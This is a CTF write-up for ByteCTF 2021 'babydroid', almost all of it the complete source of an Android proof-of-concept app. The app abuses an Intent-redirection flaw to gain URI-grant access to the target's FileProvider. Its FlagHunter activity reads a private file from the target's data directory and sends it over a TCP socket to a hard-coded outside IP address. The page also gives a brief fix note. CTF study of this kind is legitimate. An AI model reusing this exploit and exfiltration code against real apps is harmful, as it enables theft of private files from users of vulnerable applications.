
bytectf2021_babydroid

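目标应用 com.bytectf.babydroid 存在 Intent 重定向漏洞:从下面的 PoC 来看,其 Vulnerable 组件会直接启动调用方放在 "intent" extra 中的 Intent。修复思路是在转发前校验嵌套 Intent 的目标组件,并清除其中的 URI 授权标志。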

MainActivity.java

package com.bytectf.pwnbabydroid;
import android.app.Activity;
import android.content.ContentValues;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.provider.MediaStore;
import android.widget.Toast;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;

/**
 * Entry point of the proof-of-concept app for the babydroid Intent-redirection issue.
 *
 * <p>It wraps one Intent inside another: the outer Intent is addressed to the target's
 * {@code Vulnerable} activity, and the inner one (carried in the {@code "intent"} extra)
 * points back at this package's {@code FlagHunter} with URI-grant flags set.
 *
 * <p>NOTE(review): the source of {@code Vulnerable} is not shown on the page. The PoC only
 * makes sense if that activity starts the nested Intent under its own identity, which is
 * what lets the grant flags apply to the target's provider. The defensive takeaway is to
 * never launch a caller-supplied Intent without checking its component and stripping the
 * {@code FLAG_GRANT_*} flags.
 */
public class MainActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Read, write, persistable and prefix grants combined. The prefix grant covers every
        // URI that starts with the data URI below, not just that one URI.
        final int grantFlags = Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
                | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
                | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION;

        // Inner Intent: an explicit component in this package, with the provider root as data.
        Intent nested = new Intent();
        nested.setData(Uri.parse("content://androidx.core.content.FileProvider/"));
        nested.setClassName(getPackageName(), "com.bytectf.pwnbabydroid.FlagHunter");
        nested.setFlags(grantFlags);

        // Outer Intent: an explicit component in the target app, carrying the inner Intent.
        Intent outer = new Intent()
                .setAction("com.bytectf.TEST")
                .setClassName("com.bytectf.babydroid", "com.bytectf.babydroid.Vulnerable")
                .putExtra("intent", nested);
        startActivity(outer);
    }
}

FlagHunter.java

package com.bytectf.pwnbabydroid;
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
import android.widget.Toast;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
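/**
 * Second stage of the proof of concept: the activity named by the nested Intent that
 * {@code MainActivity} builds.
 *
 * <p>It takes the data URI of the Intent that started it, appends the flag file path, reads
 * that {@code content://} URI through the {@link android.content.ContentResolver}, writes the
 * content to logcat and sends it to a hard-coded TCP endpoint.
 *
 * <p>NOTE(review): the read can only succeed if the launching Intent carried a URI grant
 * issued by the app that owns the provider. Confirm this against the target's
 * {@code Vulnerable} activity, which is not shown on the page.
 */
public class FlagHunter extends Activity {
    @Override
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        try {
            // The leading "/root" segment presumably matches a <root-path> entry in the
            // target's FileProvider paths; the provider config is not shown on the page.
            String file = "/root/data/data/com.bytectf.babydroid/files/flag";
            final String flag = readAll(Uri.parse(getIntent().getDataString() + file));
            Log.e("FlagHunter", flag);

            // Network I/O is not allowed on the main thread, so the upload runs on a worker.
            new Thread(new Runnable() {
                @Override
                public void run() {
                    try {
                        send(flag);
                    } catch (Exception e) {
                        Log.e("FlagHunter_Err", e.toString());
                    }
                }
            }).start();
        } catch (Exception e) {
            Log.e("FlagHunter_Err", e.toString());
        }
    }

    /**
     * Reads the whole content behind {@code uri} as text, with line terminators dropped.
     *
     * @param uri content URI to open through this activity's ContentResolver
     * @return the concatenated lines of the stream
     * @throws Exception if the URI cannot be opened or read
     */
    private String readAll(Uri uri) throws Exception {
        InputStream is = getContentResolver().openInputStream(uri);
        if (is == null) {
            // openInputStream may return null; fail with a clear message instead of an NPE.
            throw new IllegalStateException("provider returned no stream for " + uri);
        }
        // try-with-resources closes the reader (and the wrapped stream) even when readLine throws.
        try (BufferedReader br = new BufferedReader(new InputStreamReader(is))) {
            StringBuilder sb = new StringBuilder();
            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line);
            }
            return sb.toString();
        }
    }

    /**
     * Sends {@code payload} to the fixed endpoint used in the write-up.
     *
     * @param payload text to transmit
     * @throws Exception if connecting or writing fails
     */
    private static void send(String payload) throws Exception {
        // Closing the socket also closes its output stream, on success or on failure.
        try (Socket sk = new Socket()) {
            SocketAddress address = new InetSocketAddress("192.3.81.102", 6666);
            sk.connect(address, 5000); // 5 s connect timeout
            sk.setTcpNoDelay(true);
            sk.setKeepAlive(true);
            OutputStream os = sk.getOutputStream();
            os.write(payload.getBytes());
            os.flush();
        }
    }
}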

AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.bytectf.pwnbabydroid">
<!-- Manifest of the proof-of-concept app. INTERNET is the only permission it requests;
     FlagHunter needs it for its outbound socket. No storage or other permission is
     declared, so the file read in FlagHunter relies on a URI grant rather than on a
     permission held by this package. -->
<uses-permission android:name="android.permission.INTERNET" />
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true" >
<!-- Launcher activity: builds the nested Intent and sends it to the target app. -->
<activity
android:name=".MainActivity"
android:exported="true"
android:label="@string/title_activity_main">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<!-- Exported so that a component in another package can start it. Here that would be
     the target's Vulnerable activity when it forwards the nested Intent
     (NOTE(review): inferred from MainActivity; the target's code is not shown). -->
<activity android:name="com.bytectf.pwnbabydroid.FlagHunter" android:exported="true" />
</application>
</manifest>